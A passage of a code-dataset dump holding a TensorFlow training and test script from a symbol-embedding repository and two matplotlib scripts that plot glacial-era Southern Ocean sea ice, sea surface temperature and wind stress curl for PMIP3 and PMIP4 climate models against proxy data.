[code_labels, tuple_labels])\n one_hot_labels = tf.one_hot(labels, 2)\n\n data = tf.concat(0, [codes, tuples])\n logits = model.type_detector(data)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits, one_hot_labels))\n prec = tf.reduce_mean(tf.cast(tf.equal(tf.arg_max(logits, 1), labels), dtype=f32))\n return loss, prec\n\n\ndef do_train():\n print('vocabulary {}, code_width {}, sequence_len {}'.format(FLAGS.num_symbols, FLAGS.code_width, FLAGS.seq_len))\n\n ensure_dir('checkpoints')\n ensure_dir('logs')\n\n p_ids = tf.placeholder(f32, [None, FLAGS.seq_len, model.sym_width], name='ids') # Batch x Seq x SymWidth\n ids_2d = tf.reshape(p_ids, [-1, model.sym_width])\n sym_codes = tf.reshape(model.embed(ids_2d), [-1, FLAGS.seq_len, model.code_width]) # Batch x Seq x Code\n seqs = tf.transpose(sym_codes, perm=[1, 0, 2]) # Seq x Batch x Code\n\n # for coder\n p_diff_ids = tf.placeholder(f32, [None, pair_sz, model.sym_width], name='diff_ids')\n code_loss, code_min = learn_coder(p_diff_ids)\n\n # Tuple/Untuple\n tuple_loss, tuple_max, tuple_codes, rev_seqs = learn_tuple(seqs)\n\n # Folds\n code_l, seq_max_l, tup_max_l, seq_loss_l, tup_loss_l, rev_seqs_l = learn_fold(seqs, 'Left')\n code_r, seq_max_r, tup_max_r, seq_loss_r, tup_loss_r, _ = learn_fold(seqs, 'Right')\n\n # Left-to right morphism\n code_dist_lr_loss, code_dist_rl_loss = learn_morphisms(code_l, code_r)\n\n # restoration accuracy\n p_all_ids = tf.placeholder(f32, [model.sym_width, model.num_syms], name='all_ids')\n all_codes = model.embed(p_all_ids)\n\n elem_restoration_stats, num_proper_restorations_hist = restoration_precision(seqs, rev_seqs, all_codes) # rev_seqs_l for folds\n\n # Visualization\n nc = tf.shape(all_codes)[0]\n all_code_stacks_1 = tf.reshape(tf.tile(all_codes, [nc, 1]), [nc, nc, -1])\n all_code_stacks_2 = tf.transpose(all_code_stacks_1, perm=[1, 0, 2])\n all_code_pairs_1 = tf.reshape(all_code_stacks_1, [nc * nc, -1])\n all_code_pairs_2 = tf.reshape(all_code_stacks_2, [nc * nc, -1])\n all_code_pairs = tf.stack([all_code_pairs_1, all_code_pairs_2])\n all_tuples, all_rev_sym = vis_tuple(all_code_pairs)\n\n # Type Detector\n type_det_loss, type_det_prec = learn_type_detector(all_codes, all_tuples)\n\n # loss for folds\n # full_loss = seq_loss_l + tup_loss_l + seq_loss_r + tup_loss_r + code_loss + code_dist_lr_loss + code_dist_rl_loss #+ 
det_cross_ent\n # loss for tuple/untuple\n full_loss = tuple_loss + code_loss + type_det_loss\n step = tf.train.AdamOptimizer(0.01).minimize(full_loss)\n\n experiment_date = experiment + \"-\" + strftime(\"%Y-%m-%d-%H%M%S\", localtime())\n writer = tf.summary.FileWriter(\"logs/\" + experiment_date, flush_secs=5)\n summaries = tf.summary.merge_all()\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n writer.add_graph(sess.graph)\n k = None\n all_perfect = 0\n\n all_ids_v = list(model.one_hot(model.symbols))\n\n for i in range(FLAGS.steps):\n k = i\n ids_v = sym_list_batch(FLAGS.seq_len, FLAGS.batch_size, False)\n diff_ids_v = sym_list_batch(pair_sz, model.num_syms, True)\n\n # logs_ = ((seq_max_l, tup_max_l, code_min), (seq_max_r, tup_max_r),\n # (seq_loss_l, tup_loss_l, code_loss, code_dist_lr_loss, code_dist_rl_loss))\n\n logs_ = ((tuple_loss, tuple_max), (code_min,), (type_det_loss, type_det_prec))\n vis_data_ = {\"coder\": model.Coder.parameters(), \"tuple_codes\": all_tuples, \"rev_seqs\": all_rev_sym}\n\n _, bin_summary, logs, restoration_stats, vis_data = \\\n sess.run([step, summaries, logs_,\n (num_proper_restorations_hist, elem_restoration_stats),\n vis_data_], # (det_cs1_acc, det_tups_acc, det_cross_ent)\n feed_dict={\n p_ids: ids_v,\n p_diff_ids: diff_ids_v,\n p_all_ids: all_ids_v\n })\n tuple_logs, coder_logs, type_det_logs = logs\n\n if restoration_stats[0][FLAGS.seq_len] == FLAGS.batch_size:\n all_perfect += 1\n else:\n all_perfect = 0\n\n if tuple_logs[0] < eps and coder_logs[0] > 0.5 and type_det_logs[1] > 0.99 : # or all_perfect >= 10000:\n print(\"early stopping\")\n break\n\n if i % 100 == 0:\n writer.add_summary(bin_summary, i)\n print(i, list(restoration_stats[0]), list(restoration_stats[1]), logs)\n model.draw_matrices(vis_data)\n\n if i % 1000 == 0:\n model.net_saver.save(sess, \"checkpoints/\" + experiment_date, global_step=k)\n\n if i % 5000 == 0:\n model.print_matrices(sess)\n\n\ndo_train()\n#elif sys.argv[3] == 'test':\n# checkpoint = sys.argv[4]\n# do_test(checkpoint)\n"
},
{
"alpha_fraction": 0.4897959232330322,
"alphanum_fraction": 0.5236151814460754,
"avg_line_length": 31.320755004882812,
"blob_id": "81ed1d2eadc5c343bf949646908cd4da39ea496f",
"content_id": "76aba0e0eaeffb2e057e75fb20b46cd33634e824",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1715,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 53,
"path": "/test.py",
"repo_name": "akamaus/emlambda",
"src_encoding": "UTF-8",
"text": "\nntop = 5\ntries = 10\ndef do_test(snapshot):\n p_all_ids = tf.placeholder(f32, [sym_width, num_syms])\n\n p_id1 = tf.placeholder(f32, [sym_width, 1])\n p_id2 = tf.placeholder(f32, [sym_width, 1])\n\n c1 = tf.matmul(Coder, p_id1)\n c2 = tf.matmul(Coder, p_id2)\n\n tup = tf.matmul(Tuple, tf.concat(0,[c1,c2]))\n\n c1_rev = tf.matmul(UnTuple1,tup)\n c2_rev = tf.matmul(UnTuple2,tup)\n\n all_cs = tf.matmul(Coder, p_all_ids)\n\n diff1 = tf.sqrt(tf.squared_difference(all_cs, c1_rev))\n values, entries = tf.nn.top_k(-diff1, ntop )\n\n with tf.Session() as sess:\n tf.initialize_all_variables().run()\n\n net_saver.restore(sess, snapshot)\n\n successes1 = 0\n confidence_neg = 0\n confidence_pos = 0\n for k in range(tries):\n pair = id_pairs(1, False)\n v_values, v_entries = sess.run([values, entries], feed_dict = {\n p_id1 : pair[0],\n p_id2 : pair[1],\n p_all_ids : np.transpose(list(sym_dict.values()))\n }\n )\n if np.argmax(pair[0]) == v_entries[0,0]:\n successes1 += 1\n confidence_pos += v_values[0,1] / v_values[0,0]\n else:\n confidence_neg += v_values[0,1] / v_values[0,0]\n\n for i in range(ntop):\n e = v_entries[0,i]\n v = -v_values[0,i]\n print('sym', np.argmax(pair[0]), 'restored', e, 'value', v)\n\n print('successes: ', successes1, 'of', tries)\n if successes1 > 0:\n print('confidence_pos', confidence_pos / successes1)\n if successes1 < tries:\n print('confidence_neg', confidence_neg / (tries - successes1))\n\n"
}
] | 3 |
RyanAGreen/PMIP_seaice | https://github.com/RyanAGreen/PMIP_seaice | b0a3aa5ad5cac68878eb948654df74d1cdd09549 | d89fa29e53fd72e553f5ee2b461225fb9ea4cbf6 | e0c1539b3bcee743b62010f41e5d6b9e1234ac6b | refs/heads/main | 2023-08-23T21:04:58.405480 | 2023-05-11T20:17:08 | 2023-05-11T20:17:08 | 416,446,753 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.652002215385437,
"alphanum_fraction": 0.7202432751655579,
"avg_line_length": 44.70758056640625,
"blob_id": "9851c272a92ce9726b873957123e1a5f308840c4",
"content_id": "e7bcc0345cd6e1b6da42924c48254cbb2e7eb459",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12669,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 277,
"path": "/Figure2.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport xarray as xr\nimport matplotlib as mpl\n\n# most area to least area finished with MMM\n\n# PMIP3\n# CCSM4, FGOALS, MRI, MPI, MIROC, IPSL, GISS, CNRM (MMM is commented after because removed later MMM)\n\nseaiceedge_PMIP3 = [-55.5,-61.5,-62.5,-65,-66.5,-70,-65.5,-75.5] #,-62.5]\nSSTtest_PMIP3 = [-0.5208,1.998,2.885,2.692,2.911,2.884,3.708,5.582] #,2.95]\nseaicearea_PMIP3 = [ 27.46,13.62,12.54,5.187,3.530,2.414,2.391,.06047] #,9.34]\ncolorsPMIP3 = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\n\n# PMIP4\n#UoTCCSM4, CESM1.2, LOVECLIM, AWI, MPI, IPSL, MIROC (MMM is commented after because removed later MMM)\nseaiceedge_PMIP4 = [-53,-57.5,-59.5,-62,-65,-70,-75.5] #,-59]\nSSTtest_PMIP4 = [-1.017,0.161,2.218,0.957,2.451,3.404,5.583] #,1.774]\nseaicearea_PMIP4 = [ 33.15,23.75,17.55,14.73,5.18,2.46,0.36] #,19.08]\n# need to decide color for MMM\ncolorsPMIP4 = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\n\n\n# LOVECLIM\n# weakNA_AB (LOVE2), weak_AB (LOVE1) (MMM is commented after because removed later MMM)\nseaiceedge_LOVE = [-58.5, -59.5] #,-59]\nSSTtest_LOVE = [1.61,2.15] #, 1.875]\nseaicearea_LOVE = [20.27, 15.73] #, 18.47]\ncolorsLOVE = ['#F7DC6F','#F7DC6F']\n\n\n# proxy\nproxyseaicearea = [15.9]\nproxyseaiceedge = [-61]\nproxySST = [1.52]\ncolorsproxy=['white']\nfacecolorsproxy=['black']\n\n# total (excluding MMM and proxy)\n# PMIP3, PMIP4, LOVECLIM PMIP3\n#seaiceedge_total = np.array([-55.5,-61.5,-62.5,-65,-66.5,-70,-65.5,-75.5,-53,-57.5,-59.5,-62,-65,-70,-75.5])\nseaiceedge_total = seaiceedge_PMIP3 + seaiceedge_PMIP4 + seaiceedge_LOVE\n#SSTtest_total = [-0.5208,1.998,2.885,2.692,2.911,2.884,3.708,5.582,-1.017,0.161,2.218,0.957,2.451,3.404,5.583]\nSSTtest_total = SSTtest_PMIP3 + SSTtest_PMIP4 + SSTtest_LOVE\n#seaicearea_total = [27.46,13.62,12.54,5.187,3.530,2.414,2.391,.06047,33.15,23.75,17.55,14.73,5.18,2.46,0.36]\nseaicearea_total = seaicearea_PMIP3 + seaicearea_PMIP4 + seaicearea_LOVE\n\n# linear fit for sea ice edge vs SST\nfit = np.polyfit(SSTtest_total,seaiceedge_total,1)\nang_coeff = fit[0]\nintercept = fit[1]\nfit_sie = ang_coeff*np.asarray(SSTtest_total) + intercept\n\n# linear fit for sea ice area vs SST\nfit = np.polyfit(SSTtest_total,seaicearea_total,1)\nang_coeff = fit[0]\nintercept = fit[1]\nfit_sia = ang_coeff*np.asarray(SSTtest_total) + intercept\n\n# proxy data\nproxy = pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n\nMIROC4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/MIROCsstzonallyavg.nc')\nIPSL4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/IPSLsstzonallyavg.nc')\nMPI4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/MPIsstzonallyavg.nc')\nAWI4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AWIsstzonallyavg.nc')\nLOVE4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVEsstzonallyavg.nc')\nCESM4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/CESMsstzonallyavg.nc')\nCCSM44 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/CCSM4sstzonallyavg.nc')\nPMIP3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/TOSSummerAllModelsnew.nc')\nLOVEsens = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVE_summer_zonnalyaveSST.nc')\n\n# PMIP3\nCNRM3 = PMIP3.TOS2 - 
273.15\nGISS3 = PMIP3.TOS4 - 273.15\nIPSL3 = PMIP3.TOS5 - 273.15\nMIROC3 = PMIP3.TOS6 - 273.15\nMPI3 = PMIP3.TOS7 - 273.15\nMRI3 = PMIP3.TOS8\nFGOALS3 = PMIP3.TOS3 - 273.15\nCCSM43 = PMIP3.TOS1 - 273.15\nPMIP3_zonal = [CCSM43,FGOALS3,MRI3,MPI3,MIROC3,IPSL3,GISS3,CNRM3]\nPMIP3_zonal_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\n\n# PMIP4\nMIROC4 = MIROC4.TOS\nIPSL4 = IPSL4.TOS\nMPI4 = MPI4.TOS\nAWI4 = AWI4.TOS\nLOVE4 = LOVE4.TOS\nCESM4 = CESM4.TOS\nCCSM44 = CCSM44.TOS\nPMIP4_zonal = [CCSM44,CESM4,LOVE4,AWI4,MPI4,IPSL4,MIROC4]\nPMIP4_zonal_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\n\n# LOVECLIM\nweakNA = LOVEsens.WEAKNA_SUM_SST\nweakNA_AB = LOVEsens.WEAKNA_AB_SUM_SST\nLOVE_zonal = [weakNA,weakNA_AB]\nLOVE_zonal_colors = ['#F7DC6F','#F7DC6F']\nLOVE_linestyle = ['dotted','dashdot']\n\n# set up x axis\nlatitude = np.arange(-89.5,90.5,1)\n\n# setting up the legends\n\n# legend will be least to greatest sea ice for all models\nCNRM_legend = mpatches.Patch(color='black', label='CNRM')\nMIROC_legend = mpatches.Patch(color='#9467bd', label='MIROC-ESM-P/MIROC-ES2L')\nGISS_legend = mpatches.Patch(color='#17becf', label='GISS-E2-R')\nIPSL_legend = mpatches.Patch(color='#2ca02c', label='IPSL-CM5A-LR/IPSL-CM5A2')\nMPI_legend = mpatches.Patch(color='#bcbd22', label='MPI-ESM-P/MPI-ESM1-2')\nMRI_legend = mpatches.Patch(color='#1f77b4', label='MRI-CGCM3')\nFGOALS_legend = mpatches.Patch(color='#e377c2', label='FGOALS-G2')\nAWI_legend = mpatches.Patch(color='#B8255F', label='AWI-ESM-1')\nLOVE_legend = mpatches.Patch(color='#F7DC6F', label='LOVECLIM')\nCESM_legend = mpatches.Patch(color='#8c564b', label='CESM1.2')\nCCSM4_legend = mpatches.Patch(color='#ff7f0e', label='CCSM4/UoTCCSM4')\n#MMM_legend = mpatches.Patch(color='black', label='Multi-model means')\nproxy_legend = mpatches.Patch(color='grey', label='Proxy data')\n\n\nPMIP3_legend = mlines.Line2D([], [], color='black', marker='^', linestyle='None',markersize=8,markerfacecolor='white', label='PMIP3 models')\nPMIP4_legend = mlines.Line2D([], [], color='black', marker='s', linestyle='None',markersize=8,markerfacecolor='white', label='PMIP4 models')\nweakNA_legend = mlines.Line2D([], [], color='black', marker='P', linestyle='None',markersize=8,markerfacecolor='white', label='LOVECLIM-weakNA')\nweakNA_AB_legend = mlines.Line2D([], [], color='black', marker='X', linestyle='None',markersize=8,markerfacecolor='white', label='LOVECLIM-WeakNA_AB')\nProxy_legend = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8,markerfacecolor='white', label='Proxy estimate')\nProxy_uncertainty = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8,markerfacecolor='white',alpha=0.3, label='Proxy uncertainty')\n#MMM = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8, label='Multi-model mean')\ndensly = (0, (3, 1, 1, 1))\nLOVE1_legend = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dotted',label = 'LOVECLIM-weakNA')\nLOVE2_legend = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dashdot',label = 'LOVECLIM-weakNA_AB')\nPMIP3_line = mlines.Line2D([], [], color='black', linestyle ='solid',label = 'PMIP3 model')\nPMIP4_line = mlines.Line2D([], [], color='black', linestyle =densly,label = 'PMIP4 model')\ndegree = mlines.Line2D([], [], color='grey', linestyle ='dashed',label = '-2 ˚C')\n\nuncertainty_sie = plt.Circle((proxySST, proxyseaiceedge), 0.67, color='k', fill=False)\nuncertainty_sia = plt.Circle((proxySST, 
proxyseaicearea), 0.67, color='k', fill=False)\n\nplt.figure(figsize=(16, 16))\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nmpl.rcParams['axes.linewidth'] = 3 #set the value globally\n\n# plotting sea ice edge\n\nplt.subplot(3, 2, 1)\n#plt.gca().add_patch(uncertainty_sie)\nplt.plot(proxySST,proxyseaiceedge,'ko',fillstyle='none',markersize=69,alpha=0.3)\nfor i in range(len(seaiceedge_PMIP3)):\n plt.plot(SSTtest_PMIP3[i],seaiceedge_PMIP3[i],marker='^',markersize=8,markeredgecolor='k',color=colorsPMIP3[i],zorder=4)\nfor i in range(len(seaiceedge_PMIP4)):\n plt.plot(SSTtest_PMIP4[i],seaiceedge_PMIP4[i],marker='s',markersize=8,markeredgecolor='k',color=colorsPMIP4[i])\n# no for loop for love because two different symbols\nplt.plot(SSTtest_LOVE[0],seaiceedge_LOVE[0],marker='X',markersize=8,color=colorsLOVE[0],markeredgecolor='k')\nplt.plot(SSTtest_LOVE[1],seaiceedge_LOVE[1],marker='P',markersize=8,color=colorsLOVE[0],markeredgecolor='k')\nplt.plot(proxySST,proxyseaiceedge,marker='o',markersize=8,color='white',markeredgecolor='k',zorder=4)\n# not sure what to do about this symbol\n#plt.plot(SSTtest_LOVE[2],seaiceedge_LOVE[2],marker='X',markersize=8,color='black')\n# no proxy sea ice edge yet\n#linear fit\nplt.plot(SSTtest_total,fit_sie,'grey')\n\n# labeling\nplt.grid()\nplt.xlabel('SST (˚ C)',fontweight='bold',fontsize=15)\nplt.ylabel('Sea ice edge (˚ S)',fontweight='bold',fontsize=15)\nplt.tick_params(bottom=True, top=True, left=True, right=True)\nplt.tick_params(axis='both', direction=\"in\", length=7, width=3, color=\"black\")\n\n\n\n# plotting sea ice area\n\nplt.subplot(3,2,2)\nplt.tick_params(bottom=False, top=True, left=False, right=False)\n#plt.gca().add_patch(uncertainty_sia)\nplt.plot(proxySST,proxyseaicearea,'ko',fillstyle='none',markersize=68,alpha=0.3)\nfor i in range(len(seaiceedge_PMIP3)):\n plt.plot(SSTtest_PMIP3[i],seaicearea_PMIP3[i],marker='^',markersize=8,color=colorsPMIP3[i],markeredgecolor='k',zorder=4)\nfor i in range(len(seaiceedge_PMIP4)):\n plt.plot(SSTtest_PMIP4[i],seaicearea_PMIP4[i],marker='s',markersize=8,color=colorsPMIP4[i],markeredgecolor='k')\n# no for loop for love because two different symbols\nplt.plot(SSTtest_LOVE[0],seaicearea_LOVE[0],marker='P',markersize=8,color=colorsLOVE[0],markeredgecolor='k')\nplt.plot(SSTtest_LOVE[1],seaicearea_LOVE[1],marker='X',markersize=8,color=colorsLOVE[0],markeredgecolor='k')\n# not sure what to do about this symbol\n#plt.plot(SSTtest_LOVE[2],seaicearea_LOVE[2],marker='X',markersize=8,color='black')\n# proxy\nplt.plot(proxySST,proxyseaicearea,marker='o',markersize=8,color='white',markeredgecolor='k')\n#linear fit\nplt.plot(SSTtest_total,fit_sia,'grey',zorder=0)\n# labeling\nplt.grid()\nplt.xlabel('SST (˚ C)',fontweight='bold',fontsize=15)\nplt.ylabel('Sea ice extent (10$^6$ km$^2$) ',fontweight='bold',fontsize=15)\nplt.tick_params(bottom=True, top=True, left=True, right=True)\nplt.tick_params(axis='both', direction=\"in\", length=7, width=3, color=\"black\")\nplt.legend(handles=[PMIP3_legend,PMIP4_legend,weakNA_legend,weakNA_AB_legend,Proxy_legend,Proxy_uncertainty],ncol=2)\n\n\n# plotting zonal averages\n\nplt.subplot(3,2,(3,4))\n# two different ways of doing the same thing\nfor i in range(len(PMIP3_zonal)):\n plt.plot(latitude,PMIP3_zonal[i],color=PMIP3_zonal_colors[i])\nfor y,c,l in zip(LOVE_zonal, LOVE_zonal_colors,LOVE_linestyle):\n plt.plot(latitude,y,color=c,linestyle=l)\n\nproxy = 
pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n\nplt.scatter(data.Latitude,data.LGM,color='darkgray')\nave = data\nave.Latitude = ave.Latitude.round()\nave = ave.astype(float)\nproxyavg = ave.groupby('Latitude').mean().reset_index()\nplt.plot(proxyavg.Latitude,proxyavg.LGM,color='darkgray')\nplt.hlines(y=-2,xmin=-60,xmax=-35,linestyles='dashed',color='grey')\nplt.xlim(-75,-35)\nplt.ylim(-5,25)\nplt.ylabel('SST (˚ C) ',fontweight='bold',fontsize=15)\n#plt.xlabel('Latitude (˚ S)',fontweight='bold',fontsize=15)\nplt.tick_params(bottom=True, top=True, left=True, right=True)\nplt.tick_params(axis='both', direction=\"in\", length=7, width=3, color=\"black\")\nplt.grid()\nplt.legend(handles=[CNRM_legend,MIROC_legend,GISS_legend,IPSL_legend,MPI_legend,MRI_legend,FGOALS_legend,AWI_legend,LOVE_legend,CESM_legend,CCSM4_legend,proxy_legend,LOVE1_legend,LOVE2_legend,degree],ncol=2)\nplt.title('PMIP3 models and LOVECLIM sensitivity runs',fontweight='bold',fontsize=15)\n\n# PMIP4\n\nplt.subplot(3,2,(5,6))\nfor y,c in zip(PMIP4_zonal, PMIP4_zonal_colors):\n plt.plot(latitude,y,color=c)\n\nproxy = pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\nplt.scatter(data.Latitude,data.LGM,color='darkgray')\n\n\n# for some reason was changing the OG data frame so doing changes here\n# cleaning up proxy data for zonally averaged line\nave = data\nave.Latitude = ave.Latitude.round()\nave = ave.astype(float)\nproxyavg = ave.groupby('Latitude').mean().reset_index()\nplt.plot(proxyavg.Latitude,proxyavg.LGM,color='darkgray')\nplt.hlines(y=-2,xmin=-60,xmax=-35,linestyles='dashed',color='grey')\nplt.xlim(-75,-35)\nplt.ylim(-5,25)\nplt.ylabel('SST (˚ C) ',fontweight='bold',fontsize=15)\nplt.xlabel('Latitude (˚ S)',fontweight='bold',fontsize=15)\nplt.tick_params(bottom=True, top=True, left=True, right=True)\nplt.tick_params(axis='both', direction=\"in\", length=7, width=3, color=\"black\")\nplt.grid()\nplt.title('PMIP4 models',fontweight='bold',fontsize=15)\nplt.tight_layout()\nplt.show()\n#plt.savefig('Figures/Figure2.pdf')\n"
},
{
"alpha_fraction": 0.6014330983161926,
"alphanum_fraction": 0.681369423866272,
"avg_line_length": 47.30769348144531,
"blob_id": "5c38b25fd7214116a6c9e71841ecc3f632efeccc",
"content_id": "a5bf5dbbe1d46619c67a90b391851f7ddf1f910c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6281,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 130,
"path": "/Figure5.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport matplotlib as mpl\n\ncurl = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlPMIP4.nc')\nPMIP3_bad = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlbadLOVE1.nc')\nPMIP3_good = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlgoodLOVE1.nc')\n\ncurl['CESM'] = curl.CESM*0.1\n\nLOVE = [PMIP3_good.CURLNAW,PMIP3_good.CURLNAWSOW]\nPMIP3 = [PMIP3_bad.CURLCNRM,PMIP3_bad.CURLGISS,PMIP3_bad.CURLIPSL,PMIP3_good.CURLMIROC,PMIP3_good.CURLMPI,PMIP3_good.CURLMRI,PMIP3_good.CURLFGOALS,PMIP3_bad.CURLCCSM4]\nPMIP4 = [curl.MIROC,curl.IPSL,curl.MPI,curl.AWI,curl.LOVE,curl.CESM,curl.CCSM4]\n# these are exact but I rounded\n# PMIP3_sie = [-75.5,-65.5,-70,-66.5,-65,-62.5,-61.5,-55.5]\n# PMIP4_sie = [-75.5,-70,-65,-62,-59.5,-57.5,-53]\n# LOVE_sie = [-59.5,58.5]\n\n# rounded down\nPMIP3_sie = [-75.5,-65.5,-69.5,-66.5,-64.5,-62.5,-61.5,-55.5]\nPMIP4_sie = [-75.5,-69.5,-64.5,-61.5,-59.5,-57.5,-52.5]\nLOVE_sie = [-59.5,-58.5]\n\n# rounded up\n# PMIP3_sie = [-75.5,-65.5,-70.5,-66.5,-65.5,-62.5,-61.5,-55.5]\n# PMIP4_sie = [-75.5,-71.5,-65.5,-62.5,-59.5,-57.5,-53.5]\n# LOVE_sie = [-59.5,-58.5]\n\nPMIP3_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\nPMIP3_colors.reverse()\nPMIP4_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\nPMIP4_colors.reverse()\nLOVE_colors = ['#F7DC6F','#F7DC6F']\nLOVE_linestyle = ['dotted','dashdot']\n\n# set up legends\n\nPMIP3names = ['CNRM','GISS-E2-R','IPSL-CM5A-LR','MIROC-ESM-P','MPI-ESM-P','MRI-CGCM3','FGOALS-G2','CCSM4']\nPMIP4names= ['MIROC-ES2L','IPSL-CM5A2','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2','UoT-CCSM4']\nLOVEnames = ['weakNA','weakNA_AB']\n# colors are set from most sea ice to least\nPMIP3_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\nPMIP3_colors.reverse()\nPMIP4_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\nPMIP4_colors.reverse()\nLOVE_colors = ['#F7DC6F','#F7DC6F']\n\n#PMIP3\nCNRM_leg = mlines.Line2D([], [], color=PMIP3_colors[0], linestyle ='solid',label = PMIP3names[0])\nGISS3_leg = mlines.Line2D([], [], color=PMIP3_colors[1], linestyle ='solid',label = PMIP3names[1])\nIPSL3_leg = mlines.Line2D([], [], color=PMIP3_colors[2], linestyle ='solid',label = PMIP3names[2])\nMIROC3_leg = mlines.Line2D([], [], color=PMIP3_colors[3], linestyle ='solid',label = PMIP3names[3])\nMPI3_leg = mlines.Line2D([], [], color=PMIP3_colors[4], linestyle ='solid',label = PMIP3names[4])\nMRI_leg = mlines.Line2D([], [], color=PMIP3_colors[5], linestyle ='solid',label = PMIP3names[5])\nFGOALS_leg = mlines.Line2D([], [], color=PMIP3_colors[6], linestyle ='solid',label = PMIP3names[6])\nCCSM4_leg = mlines.Line2D([], [], color=PMIP3_colors[7], linestyle ='solid',label = PMIP3names[7])\n\n#PMIP4\nMIROC4_leg = mlines.Line2D([], [], color=PMIP4_colors[0], linestyle ='solid',label = PMIP4names[0])\nIPSL4_leg = mlines.Line2D([], [], color=PMIP4_colors[1], linestyle ='solid',label = PMIP4names[1])\nMPI4_leg = mlines.Line2D([], [], color=PMIP4_colors[2], linestyle ='solid',label = PMIP4names[2])\nAWI_leg = mlines.Line2D([], [], color=PMIP4_colors[3], linestyle ='solid',label = PMIP4names[3])\nLOVE_leg = mlines.Line2D([], [], color=PMIP4_colors[4], linestyle ='solid',label = PMIP4names[4])\nCESM_leg = mlines.Line2D([], [], 
color=PMIP4_colors[5], linestyle ='solid',label = PMIP4names[5])\nCCSM4UoT_leg = mlines.Line2D([], [], color=PMIP4_colors[6], linestyle ='solid',label = PMIP4names[6])\n\n#LOVE\nweakNA_leg = mlines.Line2D([], [], color=LOVE_colors[0], linestyle ='dotted',label = LOVEnames[0])\nweakNA_AB_leg = mlines.Line2D([], [], color=LOVE_colors[1], linestyle ='dashdot',label = LOVEnames[1])\n\nfig,ax = plt.subplots(3,figsize=(8,12),sharex=True)\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nymin = -2.5\nymax = 2.5\nfor i in range(3):\n ax[i].set_xlim(-80,-30)\n ax[i].set_ylim(ymin,ymax)\n ax[i].vlines(-75.5,ymin=ymin,ymax=ymax,colors='k',linestyles='dashdot',label='Antarctic Coast')\n ax[i].grid(ls=':')\n ax[i].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n for axis in ['top','bottom','left','right']:\n ax[i].spines[axis].set_linewidth(3)\n\nfor i in range(len(PMIP3)):\n ax[0].plot(PMIP3_bad.LAT,PMIP3[i],color=PMIP3_colors[i])\n ax[0].plot(PMIP3_sie[i],PMIP3[i].where(curl.LAT==PMIP3_sie[i],drop=True),marker='o',color=PMIP3_colors[i],markeredgecolor='k')\n\nax[0].legend(handles=[CNRM_leg,GISS3_leg,IPSL3_leg,MIROC3_leg,MPI3_leg,MRI_leg,FGOALS_leg,CCSM4_leg])\n\nfor i in range(len(PMIP4)):\n ax[1].plot(PMIP3_bad.LAT,PMIP4[i],color=PMIP4_colors[i])\n 